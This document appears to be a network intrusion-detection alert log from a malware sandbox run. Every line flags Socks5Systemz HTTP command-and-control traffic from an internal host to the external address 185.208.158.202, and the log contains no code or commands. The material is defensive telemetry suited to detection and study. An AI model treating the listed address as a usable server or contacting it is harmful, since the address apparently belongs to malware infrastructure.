2024-11-15T14:16:02.939497+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50552	185.208.158.202	80	TCP
2024-11-15T14:16:03.985230+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50554	185.208.158.202	80	TCP
2024-11-15T14:16:03.985230+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50554	185.208.158.202	80	TCP
2024-11-15T14:16:05.031779+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50555	185.208.158.202	80	TCP
2024-11-15T14:16:05.031779+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50555	185.208.158.202	80	TCP
2024-11-15T14:16:06.071095+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50556	185.208.158.202	80	TCP
2024-11-15T14:16:06.071095+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50556	185.208.158.202	80	TCP
2024-11-15T14:16:07.102507+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50558	185.208.158.202	80	TCP
2024-11-15T14:16:07.102507+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50558	185.208.158.202	80	TCP
2024-11-15T14:16:08.153826+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50559	185.208.158.202	80	TCP
2024-11-15T14:16:08.153826+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50559	185.208.158.202	80	TCP
2024-11-15T14:16:09.203031+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50561	185.208.158.202	80	TCP
2024-11-15T14:16:09.203031+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50561	185.208.158.202	80	TCP
2024-11-15T14:16:10.247450+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50562	185.208.158.202	80	TCP
2024-11-15T14:16:10.247450+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50562	185.208.158.202	80	TCP
2024-11-15T14:16:11.280663+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50563	185.208.158.202	80	TCP
2024-11-15T14:16:11.280663+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50563	185.208.158.202	80	TCP
2024-11-15T14:16:12.319538+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50566	185.208.158.202	80	TCP
2024-11-15T14:16:12.319538+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50566	185.208.158.202	80	TCP
2024-11-15T14:16:13.365655+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50567	185.208.158.202	80	TCP
2024-11-15T14:16:13.365655+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50567	185.208.158.202	80	TCP
2024-11-15T14:16:14.441077+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50569	185.208.158.202	80	TCP
2024-11-15T14:16:14.441077+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50569	185.208.158.202	80	TCP
2024-11-15T14:16:15.642771+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50572	185.208.158.202	80	TCP
2024-11-15T14:16:15.642771+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50572	185.208.158.202	80	TCP
2024-11-15T14:16:16.652145+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50574	185.208.158.202	80	TCP
2024-11-15T14:16:16.652145+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50574	185.208.158.202	80	TCP
2024-11-15T14:16:17.681611+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50575	185.208.158.202	80	TCP
2024-11-15T14:16:17.681611+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50575	185.208.158.202	80	TCP
2024-11-15T14:16:18.881136+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50576	185.208.158.202	80	TCP
2024-11-15T14:16:18.881136+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50576	185.208.158.202	80	TCP
2024-11-15T14:16:19.979122+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50578	185.208.158.202	80	TCP
2024-11-15T14:16:19.979122+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50578	185.208.158.202	80	TCP
2024-11-15T14:16:21.004306+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50580	185.208.158.202	80	TCP
2024-11-15T14:16:21.004306+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50580	185.208.158.202	80	TCP
2024-11-15T14:16:22.070022+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50582	185.208.158.202	80	TCP
2024-11-15T14:16:22.070022+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50582	185.208.158.202	80	TCP
2024-11-15T14:16:23.108264+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50583	185.208.158.202	80	TCP
2024-11-15T14:16:23.108264+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50583	185.208.158.202	80	TCP
2024-11-15T14:16:24.189191+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50585	185.208.158.202	80	TCP
2024-11-15T14:16:24.189191+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50585	185.208.158.202	80	TCP
2024-11-15T14:16:25.259332+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50586	185.208.158.202	80	TCP
2024-11-15T14:16:25.259332+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50586	185.208.158.202	80	TCP
2024-11-15T14:16:26.354095+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50587	185.208.158.202	80	TCP
2024-11-15T14:16:26.354095+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50587	185.208.158.202	80	TCP
2024-11-15T14:16:27.382459+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50589	185.208.158.202	80	TCP
2024-11-15T14:16:27.382459+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50589	185.208.158.202	80	TCP
2024-11-15T14:16:28.443334+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50590	185.208.158.202	80	TCP
2024-11-15T14:16:28.443334+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50590	185.208.158.202	80	TCP
2024-11-15T14:16:29.503584+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50592	185.208.158.202	80	TCP
2024-11-15T14:16:29.503584+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50592	185.208.158.202	80	TCP
2024-11-15T14:16:30.534471+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50593	185.208.158.202	80	TCP
2024-11-15T14:16:30.534471+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50593	185.208.158.202	80	TCP
2024-11-15T14:16:31.578340+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50594	185.208.158.202	80	TCP
2024-11-15T14:16:31.578340+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50594	185.208.158.202	80	TCP
2024-11-15T14:16:32.637436+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50597	185.208.158.202	80	TCP
2024-11-15T14:16:32.637436+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50597	185.208.158.202	80	TCP
2024-11-15T14:16:33.717080+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50598	185.208.158.202	80	TCP
2024-11-15T14:16:33.717080+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50598	185.208.158.202	80	TCP
2024-11-15T14:16:34.758619+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50600	185.208.158.202	80	TCP
2024-11-15T14:16:34.758619+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50600	185.208.158.202	80	TCP
2024-11-15T14:16:35.801030+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50601	185.208.158.202	80	TCP
2024-11-15T14:16:35.801030+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50601	185.208.158.202	80	TCP
2024-11-15T14:16:36.830722+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50603	185.208.158.202	80	TCP
2024-11-15T14:16:36.830722+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50603	185.208.158.202	80	TCP
2024-11-15T14:16:37.869751+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50604	185.208.158.202	80	TCP
2024-11-15T14:16:37.869751+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50604	185.208.158.202	80	TCP
2024-11-15T14:16:39.169247+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50605	185.208.158.202	80	TCP
2024-11-15T14:16:39.169247+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50605	185.208.158.202	80	TCP
2024-11-15T14:16:40.198367+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50607	185.208.158.202	80	TCP
2024-11-15T14:16:40.198367+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50607	185.208.158.202	80	TCP
2024-11-15T14:16:41.235057+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50608	185.208.158.202	80	TCP
2024-11-15T14:16:41.235057+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50608	185.208.158.202	80	TCP
2024-11-15T14:16:42.282888+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50611	185.208.158.202	80	TCP
2024-11-15T14:16:42.282888+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50611	185.208.158.202	80	TCP
2024-11-15T14:16:43.329341+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50612	185.208.158.202	80	TCP
2024-11-15T14:16:43.329341+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50612	185.208.158.202	80	TCP
2024-11-15T14:16:44.365447+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50614	185.208.158.202	80	TCP
2024-11-15T14:16:44.365447+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50614	185.208.158.202	80	TCP
2024-11-15T14:16:45.395935+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50615	185.208.158.202	80	TCP
2024-11-15T14:16:45.395935+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50615	185.208.158.202	80	TCP
2024-11-15T14:16:46.427683+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50616	185.208.158.202	80	TCP
2024-11-15T14:16:46.427683+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50616	185.208.158.202	80	TCP
2024-11-15T14:16:47.434072+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50618	185.208.158.202	80	TCP
2024-11-15T14:16:47.434072+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50618	185.208.158.202	80	TCP
2024-11-15T14:16:48.459495+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50619	185.208.158.202	80	TCP
2024-11-15T14:16:48.459495+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50619	185.208.158.202	80	TCP
2024-11-15T14:16:49.500449+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50621	185.208.158.202	80	TCP
2024-11-15T14:16:49.500449+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50621	185.208.158.202	80	TCP
2024-11-15T14:16:50.533578+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50622	185.208.158.202	80	TCP
2024-11-15T14:16:50.533578+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50622	185.208.158.202	80	TCP
2024-11-15T14:16:51.587959+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50623	185.208.158.202	80	TCP
2024-11-15T14:16:51.587959+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50623	185.208.158.202	80	TCP
2024-11-15T14:16:52.642079+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50626	185.208.158.202	80	TCP
2024-11-15T14:16:52.642079+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50626	185.208.158.202	80	TCP
2024-11-15T14:16:54.717182+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50627	185.208.158.202	80	TCP
2024-11-15T14:16:54.717182+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50627	185.208.158.202	80	TCP
2024-11-15T14:16:55.736163+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50629	185.208.158.202	80	TCP
2024-11-15T14:16:55.736163+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50629	185.208.158.202	80	TCP
2024-11-15T14:16:56.766939+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50630	185.208.158.202	80	TCP
2024-11-15T14:16:56.766939+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50630	185.208.158.202	80	TCP
2024-11-15T14:16:57.826545+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50632	185.208.158.202	80	TCP
2024-11-15T14:16:57.826545+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50632	185.208.158.202	80	TCP
2024-11-15T14:16:58.880353+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50633	185.208.158.202	80	TCP
2024-11-15T14:16:58.880353+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50633	185.208.158.202	80	TCP
2024-11-15T14:16:59.910377+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50635	185.208.158.202	80	TCP
2024-11-15T14:16:59.910377+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50635	185.208.158.202	80	TCP
2024-11-15T14:17:00.953800+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50636	185.208.158.202	80	TCP
2024-11-15T14:17:00.953800+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50636	185.208.158.202	80	TCP
2024-11-15T14:17:01.977000+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50638	185.208.158.202	80	TCP
2024-11-15T14:17:01.977000+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50638	185.208.158.202	80	TCP
2024-11-15T14:17:03.021323+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50640	185.208.158.202	80	TCP
2024-11-15T14:17:03.021323+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50640	185.208.158.202	80	TCP
2024-11-15T14:17:04.049536+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50641	185.208.158.202	80	TCP
2024-11-15T14:17:04.049536+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50641	185.208.158.202	80	TCP
2024-11-15T14:17:05.058249+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50643	185.208.158.202	80	TCP
2024-11-15T14:17:05.058249+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50643	185.208.158.202	80	TCP
2024-11-15T14:17:06.078598+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50644	185.208.158.202	80	TCP
2024-11-15T14:17:06.078598+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50644	185.208.158.202	80	TCP
2024-11-15T14:17:07.135155+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50645	185.208.158.202	80	TCP
2024-11-15T14:17:07.135155+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50645	185.208.158.202	80	TCP
2024-11-15T14:17:08.155448+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50647	185.208.158.202	80	TCP
2024-11-15T14:17:08.155448+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50647	185.208.158.202	80	TCP
2024-11-15T14:17:09.166236+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50648	185.208.158.202	80	TCP
2024-11-15T14:17:09.166236+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50648	185.208.158.202	80	TCP
2024-11-15T14:17:10.201615+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50650	185.208.158.202	80	TCP
2024-11-15T14:17:10.201615+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50650	185.208.158.202	80	TCP
2024-11-15T14:17:11.255924+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50651	185.208.158.202	80	TCP
2024-11-15T14:17:11.255924+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50651	185.208.158.202	80	TCP
2024-11-15T14:17:12.318518+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50654	185.208.158.202	80	TCP
2024-11-15T14:17:12.318518+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50654	185.208.158.202	80	TCP
2024-11-15T14:17:13.334117+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50655	185.208.158.202	80	TCP
2024-11-15T14:17:13.334117+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50655	185.208.158.202	80	TCP
2024-11-15T14:17:14.364238+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50656	185.208.158.202	80	TCP
2024-11-15T14:17:14.364238+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50656	185.208.158.202	80	TCP
2024-11-15T14:17:15.421217+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50658	185.208.158.202	80	TCP
2024-11-15T14:17:15.421217+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50658	185.208.158.202	80	TCP
2024-11-15T14:17:16.463400+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50659	185.208.158.202	80	TCP
2024-11-15T14:17:16.463400+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50659	185.208.158.202	80	TCP
2024-11-15T14:17:17.511361+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50661	185.208.158.202	80	TCP
2024-11-15T14:17:17.511361+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50661	185.208.158.202	80	TCP
2024-11-15T14:17:18.517728+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50662	185.208.158.202	80	TCP
2024-11-15T14:17:18.517728+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50662	185.208.158.202	80	TCP
2024-11-15T14:17:19.537314+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50663	185.208.158.202	80	TCP
2024-11-15T14:17:19.537314+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50663	185.208.158.202	80	TCP
2024-11-15T14:17:20.548935+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50665	185.208.158.202	80	TCP
2024-11-15T14:17:20.548935+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50665	185.208.158.202	80	TCP
2024-11-15T14:17:21.597078+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50666	185.208.158.202	80	TCP
2024-11-15T14:17:21.597078+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50666	185.208.158.202	80	TCP
2024-11-15T14:17:23.678493+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50669	185.208.158.202	80	TCP
2024-11-15T14:17:23.678493+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50669	185.208.158.202	80	TCP
2024-11-15T14:17:24.695362+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50670	185.208.158.202	80	TCP
2024-11-15T14:17:24.695362+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50670	185.208.158.202	80	TCP
2024-11-15T14:17:25.765208+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50672	185.208.158.202	80	TCP
2024-11-15T14:17:25.765208+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50672	185.208.158.202	80	TCP
2024-11-15T14:17:26.811418+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50673	185.208.158.202	80	TCP
2024-11-15T14:17:26.811418+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50673	185.208.158.202	80	TCP
2024-11-15T14:17:27.829288+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50675	185.208.158.202	80	TCP
2024-11-15T14:17:27.829288+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50675	185.208.158.202	80	TCP
2024-11-15T14:17:28.903123+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50676	185.208.158.202	80	TCP
2024-11-15T14:17:28.903123+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50676	185.208.158.202	80	TCP
2024-11-15T14:17:29.940491+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50677	185.208.158.202	80	TCP
2024-11-15T14:17:29.940491+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50677	185.208.158.202	80	TCP
2024-11-15T14:17:31.047583+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50679	185.208.158.202	80	TCP
2024-11-15T14:17:31.047583+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50679	185.208.158.202	80	TCP
2024-11-15T14:17:32.070805+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50681	185.208.158.202	80	TCP
2024-11-15T14:17:32.070805+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50681	185.208.158.202	80	TCP
2024-11-15T14:17:33.117920+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50683	185.208.158.202	80	TCP
2024-11-15T14:17:33.117920+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50683	185.208.158.202	80	TCP
2024-11-15T14:17:34.168336+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50684	185.208.158.202	80	TCP
2024-11-15T14:17:34.168336+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50684	185.208.158.202	80	TCP
2024-11-15T14:17:35.225801+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50686	185.208.158.202	80	TCP
